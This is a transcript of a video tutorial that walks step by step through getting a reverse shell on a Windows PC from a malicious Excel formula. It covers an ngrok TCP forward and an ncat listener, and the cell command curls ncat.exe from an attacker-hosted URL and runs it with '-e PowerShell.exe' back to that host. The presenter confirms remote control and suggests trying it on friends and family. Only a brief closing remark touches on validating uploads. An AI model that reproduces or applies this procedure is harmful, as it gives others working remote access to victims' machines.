So welcome back decent army, and in today's video we are going to talk about reverse shells. If you don't know about reverse shells, then probably it's a way to get remote access to your computer. And today we are going to use some of the highly optimized tools to perform this task. We will be using up the ngrok server for port forwarding, then we will use the ncat tool to build connection between the two computers, and these all things we will be doing up using an Excel file, basically using up some Excel macros and commands which you will get to see as we move ahead. But guys, just for disclaimer, this video is created for educational and tutorial purpose only. So I would like to request you that if your hands are not stopping from carrying this out, you can try it on your friends, family members and on yourself, but not on anyone else. So let's start this video without wasting any further time. So guys, here for starting off, first we need to set up the attacker environment, and I will be using up the Google Cloud console here, and I will be showing you the power of it. So if you don't know about Google Cloud, then you just need a Google account and you can start with it. You get around 50 hours per week here, and which is more than enough. So if you are a beginner and you don't have much resources, you can go ahead with that. So first of all, I need to set up my ngrok server. So now what I will do is, as I told you earlier in my video, we will be using up the ngrok server here basically for port forwarding. Setting up the ngrok, I have already told you in one of my videos, setting up the API key, the auth token and all for that particular tool. So you can check out my video for setting up the ngrok server. I will provide you with the link in the I button for that. So here I will quickly move up, and so let me check that whether my ngrok server is basically installed up here or not. I will do a ls here, and you can see that ngrok is present here. I have set up the auth token. Basically we will be doing up the port forwarding using this tool. So basically port forwarding is something you can understand like we are basically providing a public identity to a private domain. Means if I am forwarding my port 1234 on internet, it basically means that I am exposing it to the internet, and anything that is put on that port now can be accessed by anyone around the world. That is pretty awesome. Means that it doesn't remains any more private. That's why also port forwarding must not be kept like open when in no use, because it can lead to get backdoor to your computers easily. So now we will forward our port by simply typing this command /ngrok. I will use this tool, and basically here we would be forwarding the TCP port, since we want to build a TCP connection between two different PCs. So we will be forwarding our TCP port. Let's say a port like 1234, and I will simply press enter, and you can see my port is forwarded. Means this particular port can be accessed from anywhere. And what is my public identity? This thing you can see in the forwarding pane, like it's showing you that the local host 1234 port is forwarded on public internet like this 2.tcp.ngrok.io and :16505. Now we will be using up the ncat tool to open up a listener so that we can receive, and like we could listen on this particular port and receive connections on that. First of all, we need to install ncat tool. So it would be simply sudo apt install sudo apt install ncat, and I will press enter. It will take some time. It will ask for me to continue, and yes, here it installs my ncat for me. Just give it a second, and yes, ncat is installed now. Now what I would be doing is, I will simply type the command, open up my listener using ncat -nvlp 1234. I will open up the listener on the particular port which I forwarded basically. I will press enter, and it started listening on this particular port. Now you can see here ncat listening on 1234. Now we have our listener open, and basically what this command means is -nvlp. Here n stands for no DNS. Basically it would not resolve up the DNS for you. V stands for the verbose output, L stands for listen, and P stands for port, the port which we provided up here. So now since our listener is open, so we are practically very much active with the attacker machine. Now guys, let's jump quickly to the target machine and let's see how we can access up the reverse shell using an Excel file. So what we will be doing is we will use up some Excel commands to basically perform this task. Basically, as I told you earlier, we'll be using up the Excel macros and the command. I've opened up my Excel here. So in this particular place, in the first shell, let me take this first shell and I will move here and let me paste my ngrok particular thing, the port and the particular host for the ngrok, and then I will start typing up my command. So here I will come and I will type up my command. We have to basically type equals to cmd, then we need basically a pipe sign over here. With the pipe sign, then we will be using up then slash capital C, and then we will be using up the curl command. And guys, what we would be performing using this curl command is that we would be like having the ncat.exe file. You can host that ncat.exe file on any particular, like you have different files upload online hosting services, like you can use that service, like you can upload that ncat.exe file on that service, and then you can give the URL here so that you will be able to download the ncat.exe file. Then I have already hosted it using ngrok, so I would be simply providing that particular URL. This is nothing different, so you don't have to matter with it. You have to provide your particular URL where you have hosted your ncat.exe, so that you can download that particular thing. And I will also show you how it will be getting downloaded and how it will work basically. So I will provide up with the command https://1133fdrgh, and then it is .ngrok.io. After that, you have to write /ncat.exe. You have to write according to your requirement. Since I have this particular host and ncat.exe is present on my this particular server, so I will be downloading that ncat.exe file from that only. So that's why I'm mentioning here ncat.exe. You have to see your requirement and you have to check accordingly. Now I will give a space, and then what I have to do is I will simply write $output, and output would be some path. I will not simply provide up the path. This path would be the same path where my Excel documents would be saved. So I will be saving my ncat.exe in the same path. So I will simply write ncat.exe here. It will write the ncat.exe file into my particular file manager, or you can say the same path in which my Excel is opened. Again, I will give this, and then it would be an exclamation mark nm.a1. A1 is the basically shell, this one A shell, and the one basically is the row number for this. Guys, just give me a minute. Let me copy this and let me paste it up here. Sometimes it works on other shells also. If you will write A1 and you will be like making it in any other cell, then also it sometimes this command basically works, but I don't want to mess up anything, so I will simply using up the A column and the number 1 row for that. And then I will concat two different commands here. I will write and, then after and I will write cmd again at this sign. It would be this, and it would be something like my ncat.exe file, ncat.exe. This is the same command which we typed there, but now this time we will be not opening up the listener. We would be providing up with the connection. We will be building up the connection here. ncat.exe, the host and the port which are required, and we have provided it up. And what we will be providing is -e, that is -execute. It will, here we will write PowerShell.exe, PowerShell.exe, and this thing nm.a1, and this is our full command. So let me give you again an idea what we are doing here. First, we are downloading an ncat.exe file from an online hosted service. This ncat.exe you will only be hosting up, and you will give the URL through this to this command so that it gets downloaded. And in the second part, we are basically providing up our PowerShell. We are building a TCP connection and we are giving up the PowerShell here. Now I will simply come up here. I will simply say yes, yes, and this is the thing totally done here. Now let me move to the attacker environment and see whether my thing worked or not. And yes guys, you can see up that I got the reverse shell of my particular computer here. And as for verifying that whether I got the shell or not, I would be simply typing up here the command. I will create a folder here, basically mkdir, and since I am the documents folder, so there also it would be created up in the documents folder only. You are hacked, and I will press enter, and the directory has been created. And let's now guys move to the particular machine where this folder has been created. And yes guys, you can verify here that the particular directory has been created and my ncat.exe file is also present in the same documents named folder. This directory I made from that particular shell which I got, the reverse shell basically, which I got into my Google Cloud Console. Now you might be thinking of what is the use of it. So the basic use of it comes in the pentesting process. Some of you who are ethical hackers might be knowing that when an application contains a file upload functionality and when the file is uploaded from the user end, then sometimes developers, what they do is they just extract the content from the particular file and they pass it directly into that particular request, which could be seen when we intercept the request in any proxy tool like Perp Suite or any other. Now if I upload any sort of malicious file as I created while demonstrating it to you, then in that case the content must be properly validated, because if the application is any sort of file sharing application, then in that case it could lead to serious trouble to people giving their reverse shell out unknowingly. So it must be properly validated and to be handled with care. So guys, this was for this video. So if you like this video, then hit the like button, share this video with your friends, family members and all, subscribe to the channel, and if you want to show support, you can buy me a coffee. I have provided you with the link in the description box. Till then guys, tata, goodbye, and let me see you in another video.